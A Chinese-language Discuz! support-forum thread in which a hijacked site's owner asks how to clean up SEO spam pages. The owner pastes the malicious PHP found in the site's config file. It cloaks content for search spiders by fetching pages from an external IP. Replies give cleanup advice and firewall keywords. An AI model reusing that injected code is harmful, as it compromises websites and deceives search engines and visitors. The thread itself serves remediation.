Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[新需求] 网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?

[复制链接]
1270643127 发表于 2020-11-29 23:20:07 | 显示全部楼层 |阅读模式
需求发布
金额范围: 50-100 元
预算金额: 50 元
开始时间:
结束时间:
联系方式: 隐藏内容
网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?
% o2 Y5 K' D; W7 y4 x6 z7 \# v, U8 ^( S6 _' K) _$ K
网站被劫持后生成了大量首页php后面加任意字符都还是可以访问
' _4 K6 p$ |, T# f, D. @( c( b) T百度收录大量的这样帖子
' v1 u8 u- [4 g6 D: c+ c! U4 P8 M5 c1 J8 B% Y
现在如何解决这样的?
1 w: X$ l) U/ p4 `2 O) s0 o9 G" A+ D, C6 h1 \
宝塔面板。。。。。。
& M' {* J# g# ]+ s3 y; A' W3 E; {! L1 z8 q) Z  m
如/forum.php?123456+ B  \5 M) u& t* ?: ~% P1 H
/forum.php?12365
" a0 c3 e; o4 K' G8 u( @9 c$ G/forum.php?5151517 m6 g! @+ \' f7 @2 ?, n' D$ o1 P

2 l$ l! z/ P- D0 Y7 K9 x随便加都可以访问,只有首页而已其他文章帖子加就不可以。。。
% d) @1 U3 s8 {8 Z+ @' H
 楼主| 1270643127 发表于 2020-11-30 00:17:02 | 显示全部楼层

- g4 M/ u4 {  O2 G#set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://156.226.52.130");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".html")or  $tr(url,".doc")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://156.226.52.130/404.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://156.226.52.130/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}
9 a8 P% i6 E2 @3 P; J& y7 Y' B4 q// --------------------------  CONFIG ADMINCP  -------------------------- //
( z& o' m4 A7 I// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //; O; b8 x8 Y6 V$ T& R
回复

使用道具 举报

cardz! 发表于 2020-11-30 06:34:12 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

Failure 发表于 2020-11-30 11:16:25 | 显示全部楼层
你找到了劫持代码 并没有找到后门在哪,还是会出现的
回复

使用道具 举报

 楼主| 1270643127 发表于 2020-11-30 11:34:07 | 显示全部楼层
cardz! 发表于 2020-11-30 06:34# h7 i% B3 l& W, U1 N
这个是加什么都可以访问,出现这种字符的原因解决了就好了。Q3160510998

: y6 n, c0 z- N  T, R6 `  A啥原因呀?现在是加啥都还可以访问..
回复

使用道具 举报

cardz! 发表于 2020-11-30 13:54:57 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

 楼主| 1270643127 发表于 2020-11-30 17:40:38 | 显示全部楼层
cardz! 发表于 2020-11-30 13:54( u% d6 c# m- [# }4 a" ^
谁的都可以,不只是你的。
- D- E- V! i; S* Q
那不是不能解决了?已经收录了好多了
回复

使用道具 举报

babyfacer 发表于 2020-12-12 18:45:36 | 显示全部楼层
1270643127 发表于 2020-11-30 17:40
5 S( @, y3 w* M; V& X+ w那不是不能解决了?已经收录了好多了
, |8 p1 w. c2 e* L  b
你先把config里边那段代码删除,然后还要检查最近新增和修改的文件# `  x0 X3 n) }0 Z% U

+ N6 o. b! p7 s6 N0 B你去做一个抓取测试(你自己正常访问页面,是正常的,但是蜘蛛访问,是另外一个样子)
/ V0 G$ @- v1 `8 V; s1 W6 E如果没有注册百度站长或者百度统计,就去下面这个网址,也可以
. V3 b6 w/ |5 X$ L6 Y+ f4 w+ t; j
  1. http://stool.chinaz.com/tools/webcheck.aspx
复制代码

% c; u2 G0 M$ X" w8 c  g* \6 M. x) {' d: _% C! J! a* _& G
如果以前的那些页面依然有问题,就说明你没有清除干净(也算不上清除干净,你删除了恶意代码,但是后门还是在的)3 A% t7 G- k5 m7 B0 j7 ]$ Z
1 g7 }1 [' n) X& Q" [0 y: z
我自己网站的黑链网址是/?s***.后缀   清除之后,这些页面就不能访问了,然后你可以去百度提交死链,删除这些快照。当然啦,我很早以前就在robots里边直接屏蔽了【?】 所以被挂黑链半个月,百度 根本没有收录黑链。然后我发现黑链之后,直接去百度申请闭站了,解决完了才恢复的
回复

使用道具 举报

babyfacer 发表于 2020-12-12 18:47:55 | 显示全部楼层
而且你使用宝塔,宝塔有免费防火墙,你可以把恶意代码的一些关键词,比如“156.226.52.130” “$tr(url” 直接添加到防火墙。并且,定期扫描(扫描结果要分析哈,DZ默认的某些文件也会被扫描出有问题,但是并不是真的有问题)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-12-22 20:40 , Processed in 0.033697 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表